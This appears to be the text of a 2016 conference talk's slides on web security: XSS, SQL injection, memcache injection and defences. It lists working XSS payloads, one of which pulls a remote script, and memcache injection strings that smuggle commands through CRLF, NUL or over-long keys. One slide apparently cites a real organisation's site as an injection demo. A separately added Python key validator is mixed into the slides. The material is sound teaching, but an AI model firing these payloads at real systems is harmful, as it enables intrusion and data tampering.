Web Application Security (Akademik Bilişim 2016)
Ömer Çıtak
#! whoami
Full-Stack Developer @ Cydets Inc.
development && security
www.omercitak.com
Social : @Om3rCitak
#! cat index
• Cross-site Scripting (XSS)
• SQL Injection
• Memcache Injection
• Upload Authentication
#! ping-pong.jpg
#! dont-trust-anyone.jpg
#! cross-site-scripting
• Reflected XSS
• DOM Based XSS
• Stored XSS
#! reflected-xss.jpg
#! reflected-xss-poc.jpg
#! dom-based-xss.jpg
#! stored-xss.jpg
#! stored-xss-poc.jpg
#! stored-xss-poc.jpg
#! cat classic-xss-payloads
• <script>alert(1)</script>
• <img src="javascript:alert('XSS');">
• <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
• <SCRIPT a=">" SRC="http://omercitak.com/xss.js"></SCRIPT>
• <video src=1 onerror=alert(1)>
• <audio src=1 onerror=alert(1)>
• <img src=x onerror=alert(1)">
#! cat xss-bypass-payloads
• <scrscriptipt>alalertert(1)</scrscriptipt>
• alert(String.fromCharCode(88,83,83))
• <IMG SRC=ja…………….')>
• <IMG SRC='vbscript:msgbox("XSS")'>
#! xss-protection-1.jpg
• Strip Tags
  – http://php.net/manual/tr/function.strip-tags.php
#! xss-protection-2.jpg
• HTML Special Chars
  – http://php.net/manual/tr/function.htmlspecialchars.php
#! xss-protection-3.jpg
• HttpOnly Cookies (session_set_cookie_params)
#! xss-protection-4.jpg
#! xss-protection-4.jpg
#! xss-demo.jpg
#! sql-injection
• Union Based SQL Injection
• Blind SQL Injection
• Time Based SQL Injection
#! union-based-sql-injection.jpg
#! sql-injection-login-bypass.jpg
#! cat blind-sql-injection
• What if errors are hidden? (error_reporting(0))
• What if the mysql_* functions are prefixed with "@"?
#! blind-sql-injection.jpg
Boss, won't the Creator ask you on the other side, boss, why you didn't try Blind Injection?
#! blind-sql-injection.jpg
#! blind-sql-injection-poc.jpg
#! blind-sql-injection-poc.jpg
#! cat time-based-sql-injection
• What if a query that produces no output is running in the background?
  – Count Query
  – Update Query
  – Insert Query
  – Delete Query
  – Relationship Query
#! time-based-sql-injection.jpg
#! time-based-sql-injection.jpg
MySQL Server
Microsoft SQL Server
Oracle Server
#! sql-injection-poc.jpg
Amnesty International (amnesty.org.tr)
#! sql-injection-poc.jpg
#! sql-injection-demo.jpg
#! memcache-injection
#! using-memcache.jpg
#! phpstorm memcached.php
#! telnet 127.0.0.1 11211
> set key 0 10 5
> value
< STORED
> get key
< VALUE key 0 5
< value
< END
#! phpstorm memcached.php
#! phpstorm memcached.php
?key=omer 0 10 6 \r\n hacked \r\n
• urlencode('\r') = %0d
• urlencode('\n') = %0a
?key=omer 0 10 6 %0d%0a hacked %0d%0a
#! phpstorm memcached.php
> set omer 0 3600 6
> hacked
< STORED
> 123456
< ERROR
#! phpstorm memcached.php
?key=aaaaa…(251) set yenikey 0 3600 6 %0d%0a hacked %0d%0a
?key=a %00 set yenikey 0 3600 6 %0d%0a hacked %0d%0a
?key=aaaaa…(251) flush_all %0d%0a
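As an added defensive example (not code from the talk): a key validator that enforces the memcached text-protocol key rules (at most 250 bytes, no whitespace or control bytes) before a client would write `set <key> ...` to the socket, exercised against constructed query strings shaped like the three injection forms above (CRLF, NUL, 251-byte key). The function names and sample values are mine, not from the slides.

```python
from __future__ import annotations
import re
from urllib.parse import parse_qs

# memcached text-protocol key constraints (protocol.txt): a key is at most
# 250 bytes and may not contain whitespace or control characters. A client
# that checks this before building "set <key> ..." cannot be made to emit a
# second command via %0d%0a, a NUL, or an over-long key.
MAX_KEY_LEN = 250
_FORBIDDEN = re.compile(rb"[\x00-\x20\x7f]")   # NUL..space and DEL


def validate_memcached_key(key: str) -> bytes:
    """Return the key as bytes if it is safe to put on the wire, else raise."""
    raw = key.encode("utf-8")
    if not raw:
        raise ValueError("empty key")
    if len(raw) > MAX_KEY_LEN:
        raise ValueError(f"key is {len(raw)} bytes, limit is {MAX_KEY_LEN}")
    hit = _FORBIDDEN.search(raw)
    if hit:
        raise ValueError(f"key contains forbidden byte 0x{hit.group()[0]:02x}")
    return raw


def check_query_key(query_string: str) -> tuple[bool, str]:
    """Decode ?key=... as the slide's script receives it, then validate.

    Returns (accepted, reason). Decoding comes first so %0d%0a and %00 are
    judged as the bytes they become, not as harmless-looking text.
    """
    key = parse_qs(query_string, keep_blank_values=True).get("key", [""])[0]
    try:
        validate_memcached_key(key)
    except ValueError as err:
        return False, str(err)
    return True, "ok"


# Constructed samples (hypothetical, not the talk's live demo) mirroring the
# shapes shown above: CRLF, NUL and a 251-character key.
SAMPLES = {
    "plain": "key=omer",
    "crlf":  "key=omer 0 10 6 %0d%0a hacked %0d%0a",
    "nul":   "key=a%00set yenikey 0 3600 6 %0d%0a hacked %0d%0a",
    "long":  "key=" + "a" * 251,
}

if __name__ == "__main__":
    for name, qs in SAMPLES.items():
        ok, why = check_query_key(qs)
        print(f"{name:5} {'ACCEPT' if ok else 'REJECT'}  {why}")
```

The same check belongs in the client library (the safe libraries listed on the next slides do it); a null byte is rejected here because a C-based client would otherwise truncate the key at the NUL.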
#! cat vulnerable-libraries
Python : Python-pylibmc
Php : Memcached
Asp.Net : memcacheddotnetproject (1.1.5)
Java : com.meetup.memcached
#! cat safe_libraries
Python : python-memcache
Php : memcache
Java : java.net.spy.memcached
#! cat using-memcached-library
Wordpress
Joomla 3.2.2
Piwik 2.1.0
MODX Revolution 2.3
#! ascii-table.jpg
#! phpstorm memcached.php
#! upload-authentication
#! upload-authentication-poc
#! wget questions
#! exit
Thanks <3
www.omercitak.com
Social : @Om3rCitak